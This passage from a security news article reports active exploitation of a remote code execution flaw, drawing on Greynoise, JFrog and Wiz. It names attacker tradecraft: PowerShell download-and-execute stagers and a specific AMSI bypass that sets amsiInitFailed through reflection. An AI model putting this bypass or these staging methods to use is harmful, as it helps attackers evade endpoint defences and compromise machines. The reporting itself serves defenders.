The initial access attempts are using publicly disclosed proof of concept (PoC) code as a base, Greynoise says, with stage 1 payloads performing proof of execution (PoE) probes (for example, PowerShell arithmetic) to validate RCE cheaply, and using coded PowerShell download-and-execute stagers. Then a stage 2 payload that uses reflection to set System.Management.Automation.AmsiUtils.amsiInitFailed = true (a standard AMSI bypass), and iex executes the next stage.
JFrog’s security research team also today reported finding a working proof of concept that leads to code execution, and they and others have also reported finding fake PoCs containing malicious code on GitHub. “Security teams must verify sources before testing [these PoCs],” warns JFrog.
Amitai Cohen, attack vector intel lead at Wiz, also said today that the firm has seen both proof of concept exploits being published and active exploitation attempts in the wild. “Our threat teams have detected these attempts across customer environments, including deployments of cryptojacking malware and efforts to steal cloud credentials from compromised machines,” he said in an email.
